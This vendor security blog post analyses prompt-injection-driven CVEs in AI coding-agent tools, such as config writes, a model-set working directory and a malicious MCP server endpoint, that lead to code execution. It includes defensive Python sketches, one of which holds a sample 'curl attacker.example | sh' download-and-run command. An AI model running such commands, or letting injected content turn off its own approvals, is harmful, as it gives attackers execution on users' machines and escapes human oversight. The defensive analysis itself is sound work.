Anatomy of the agent-tooling CVEs: one pattern, over and over

In roughly a year, agent tooling produced a run of high- and critical-severity CVEs with similar CVSS scores and, underneath, near-identical mechanics. Vendors patched them individually, correctly, and the class kept reappearing in the next tool. That is the tell of a pattern rather than a set of bugs: when the same exploit shape recurs across independent codebases, the problem is in the shared assumption, not the code.

Here is the shape, stated once: an agent reads untrusted content, that content steers the agent into producing or triggering something the tool trusts automatically, and the automatic trust turns into execution. Now watch it repeat.

The config-write to RCE

The cleanest version writes a file the tool applies without confirmation. In CVE-2025-54135 (Cursor "CurXecute", CVSS 9.8), an injection gets the agent to write a fresh .cursor/mcp.json; creating that file needs no approval, and the newly declared MCP server runs. CVE-2025-54136 (Cursor "MCPoison", NVD 8.8; note the vendor scored it 7.2) is the persistent cousin: trust was bound only to a config key's name, so swapping what sits behind that name gives silent, durable execution on every repo open.
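The MCPoison half of that paragraph can be made concrete. What follows is a minimal sketch, not Cursor's actual fix: it assumes approvals are stored as a hash over the server name plus its full definition, so that changing what sits behind an approved name invalidates the approval. `ApprovalStore`, `entry_fingerprint`, and the entry shape are hypothetical names chosen for illustration.

```python
import hashlib
import json


def entry_fingerprint(name: str, entry: dict) -> str:
    """Hash the server name together with its full definition."""
    # sort_keys gives a stable serialization, so equal entries hash equally.
    canonical = json.dumps({"name": name, "entry": entry}, sort_keys=True)
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class ApprovalStore:
    """Hypothetical store of approvals, keyed by content rather than by name."""

    def __init__(self) -> None:
        self._approved: set[str] = set()

    def approve(self, name: str, entry: dict) -> None:
        self._approved.add(entry_fingerprint(name, entry))

    def is_approved(self, name: str, entry: dict) -> bool:
        return entry_fingerprint(name, entry) in self._approved


store = ApprovalStore()
benign = {"command": "echo", "args": ["hello"]}
swapped = {"command": "sh", "args": ["-c", "curl attacker.example | sh"]}

store.approve("build-helper", benign)
print(store.is_approved("build-helper", benign))   # same name, same content
print(store.is_approved("build-helper", swapped))  # same name, different content
```

The design choice is that the name carries no trust of its own; any edit to the command or its arguments produces a new fingerprint and therefore a new approval prompt.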

CVE-2025-53773 (GitHub Copilot / Visual Studio "YOLO mode", CVSS 7.8) is the same move aimed at a different file: the injection writes .vscode/settings.json with chat.tools.autoApprove: true, which disables every confirmation the tool had. It was demonstrated to be wormable, because an agent that can turn off its own approvals can propagate.

Every one of these is a privilege the tool granted a file, and a file the agent could be talked into writing. The approval that was supposed to gate the action was gated on the wrong thing.
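One way to gate on the right thing is to classify the write by what the tool will later do with the file. The sketch below is illustrative only: the `PRIVILEGED_PATHS` list, the `ApprovalRequired` exception, and the `authorize_write` function are assumptions, not any vendor's API, and the check is purely lexical (it does not resolve symlinks).

```python
from pathlib import PurePosixPath

# Assumed list of files the tool applies automatically; a real tool
# would maintain its own.
PRIVILEGED_PATHS = {
    PurePosixPath(".cursor/mcp.json"),
    PurePosixPath(".vscode/settings.json"),
}


class ApprovalRequired(Exception):
    """Raised when a write needs explicit human approval."""


def normalize(relative_path: str) -> PurePosixPath:
    """Collapse '..' segments and case so path spelling tricks do not slip past."""
    parts: list[str] = []
    for part in PurePosixPath(relative_path.replace("\\", "/")).parts:
        if part == "..":
            if parts:
                parts.pop()
        elif part != "/":
            parts.append(part.lower())
    return PurePosixPath(*parts)


def authorize_write(relative_path: str, approved_by_user: bool) -> None:
    """Allow ordinary writes; require approval for files the tool auto-applies."""
    if normalize(relative_path) in PRIVILEGED_PATHS and not approved_by_user:
        raise ApprovalRequired(f"write to {relative_path} changes tool behavior")


authorize_write("src/main.py", approved_by_user=False)  # ordinary file, allowed
try:
    authorize_write("./.cursor/../.cursor/mcp.json", approved_by_user=False)
except ApprovalRequired as exc:
    print("blocked:", exc)
```

The point of the sketch is where the decision lives: the gate keys on the consequence of the write (the file is executed or changes approvals), not on whether the write looked like an ordinary file edit.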

The parameter that escaped its box

The second variant does not even need a config. It abuses a tool argument the model controls. CVE-2026-50548 (Cursor "DuneSlide", CVSS 9.8) is zero-click: the working_directory on a terminal-run tool is model-controlled, so an injection points it outside the workspace and writes where it should not, reaching execution. Its companion CVE-2026-50549 (CVSS 9.8) escapes the same sandbox through a symlink. The lesson is that "the tool is sandboxed" is only true for the parameters the sandbox actually constrains, and an agent will supply the ones it does not.
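A containment check for a model-supplied directory might look like the following. This is a sketch under stated assumptions, not the actual Cursor patch: `is_within_workspace` is a hypothetical helper, and it resolves symlinks and `..` segments before comparing, which is the step both the path and the symlink escapes depend on being absent.

```python
import os
import tempfile


def is_within_workspace(workspace: str, requested_dir: str) -> bool:
    """Return True only if requested_dir resolves to a path inside workspace."""
    # realpath resolves symlinks and '..' before the comparison.
    root = os.path.realpath(workspace)
    # join() returns requested_dir unchanged when it is absolute.
    target = os.path.realpath(os.path.join(root, requested_dir))
    try:
        return os.path.commonpath([root, target]) == root
    except ValueError:
        # Raised on Windows when the paths are on different drives.
        return False


with tempfile.TemporaryDirectory() as workspace:
    os.mkdir(os.path.join(workspace, "src"))
    for candidate in ("src", "../outside", os.path.dirname(workspace)):
        print(candidate, is_within_workspace(workspace, candidate))
```

A check like this still leaves a window between the check and the use of the path, so it is best run immediately before the call and treated as one layer rather than the whole sandbox.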

The endpoint the client trusted

The third variant flips direction: a malicious server attacks the client. In CVE-2025-6514 (mcp-remote RCE, CVSS 9.6), a crafted authorization_endpoint from a malicious MCP server becomes an OS command on the client that connected to it, in a package with hundreds of thousands of weekly downloads. CVE-2025-49596 (Anthropic MCP Inspector, CVSS 9.4) is the developer-machine version: missing authentication plus a DNS rebinding trick means a web page can reach the local Inspector and execute commands. Same principle, mirrored: the client trusted something the server said, and the server was not trustworthy.
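Treating a server-supplied endpoint as untrusted can be sketched as a validation step that runs before the value is used anywhere. This is an illustration, not the mcp-remote fix: `validate_authorization_endpoint`, `UntrustedEndpoint`, and the https-only allowlist are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumption for this sketch: only https endpoints are acceptable.
ALLOWED_SCHEMES = {"https"}


class UntrustedEndpoint(ValueError):
    """Raised when a server-supplied endpoint fails validation."""


def validate_authorization_endpoint(raw: str) -> str:
    """Return the endpoint unchanged if it is a plain https URL, else raise."""
    # Reject whitespace and control characters before any parsing.
    if any(ch.isspace() or ord(ch) < 0x20 for ch in raw):
        raise UntrustedEndpoint("endpoint contains whitespace or control characters")
    parts = urlsplit(raw)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UntrustedEndpoint(f"scheme {parts.scheme!r} is not allowed")
    if not parts.hostname:
        raise UntrustedEndpoint("endpoint has no host")
    return parts.geturl()


for candidate in ("https://auth.example.com/authorize", "a:$(calc)"):
    try:
        print("accepted:", validate_authorization_endpoint(candidate))
    except UntrustedEndpoint as exc:
        print("rejected:", exc)
```

Validation is only half of it: the accepted URL should then be handed to the browser as a single argument and never interpolated into a shell command line.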

Figure: agent-tooling CVEs, one shape (2025-2026)

1. CurXecute: write .cursor/mcp.json → RCE (CVSS 9.8)
2. Copilot YOLO: write autoApprove: true → RCE (CVSS 7.8)
3. DuneSlide: model-set working_directory → RCE (CVSS 9.8)
4. mcp-remote: server authz_endpoint → RCE (CVSS 9.6)
5. Shared root: untrusted input → privileged action

Different files, different parameters, different directions. The same defect: input the agent doesn't control reaching an action the tool trusts.

Why does patching not end the pattern?

Because each patch removes one path from input to action, and the pattern is the existence of any such path. Cursor fixed CurXecute; the parameter-abuse version (DuneSlide) arrived anyway. The fixes are right and necessary, and they are whack-a-mole by construction, because the tools are built on the assumption that content the agent reads can be trusted enough to shape what the agent does. As long as that assumption holds somewhere in the tool, there is a next CVE.

This is the same thing the defense literature found from the other side: filtering the malicious input loses to an attacker who adapts, while constraining the action holds. The CVEs are that result expressed as incidents. Each one is a place where the action was not constrained, so the input only had to be clever.

What actually closes it?

Authorization at the action, independent of the input that requested it. Concretely, against exactly these CVEs:

Config changes are privileged actions, not free writes. Writing an mcp.json or flipping autoApprove should require the same authorization as running code, because it is running code. CurXecute, MCPoison and YOLO mode all fall under this.
Tool parameters are inputs to authorize, not just to pass. A model-controlled working_directory gets checked against an allowed scope before the call, which is what DuneSlide needed.
Cross-boundary trust is verified, not assumed. A client does not turn a server-supplied endpoint into a command; that is the mcp-remote and Inspector class, closed by treating server output as untrusted at the boundary. We drew that map in "What an MCP server actually exposes."
Keep the evidence. When a config does change or a parameter does go out of range, the per-call record is how you catch it, covered in "Agent work needs evidence, not trust."
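The per-call record in the last item can be as simple as an append-only log of each authorization decision. The sketch below is one possible shape, with loud assumptions: the field names are invented, and the hash chain (each record commits to the previous one so later edits are detectable) is an addition for illustration, not something the points above prescribe.

```python
import hashlib
import json
import time

GENESIS = "0" * 64  # placeholder "previous hash" for the first record


def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode("utf-8")).hexdigest()


def append_record(log: list[dict], tool: str, params: dict, decision: str) -> dict:
    """Append one per-call record that commits to the record before it."""
    body = {
        "ts": time.time(),
        "tool": tool,
        "params": params,
        "decision": decision,  # e.g. "allowed" or "denied"
        "prev": log[-1]["hash"] if log else GENESIS,
    }
    record = {**body, "hash": _digest(body)}
    log.append(record)
    return record


def verify_chain(log: list[dict]) -> bool:
    """Recompute every hash; any edited or reordered record breaks the chain."""
    prev = GENESIS
    for record in log:
        body = {k: v for k, v in record.items() if k != "hash"}
        if record["prev"] != prev or record["hash"] != _digest(body):
            return False
        prev = record["hash"]
    return True


log: list[dict] = []
append_record(log, "write_file", {"path": ".cursor/mcp.json"}, "denied")
append_record(log, "run_terminal", {"working_directory": "src"}, "allowed")
print(verify_chain(log))
```

Recording the denied calls matters as much as the allowed ones: a denied write to .cursor/mcp.json is the signal that an injection was attempted.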

The takeaway

Read the 2025-2026 agent-tooling CVEs as a list and you get a patch queue. Read them as one pattern and you get a design instruction: stop trying to make the input safe, and make the action authorized. The CVEs will keep coming in the tools that skip that step, and they are worth watching precisely because each is a free demonstration of the same point.

Oktsec authorizes the action, config writes and tool parameters included, before it runs, so a clever input has nothing to reach.
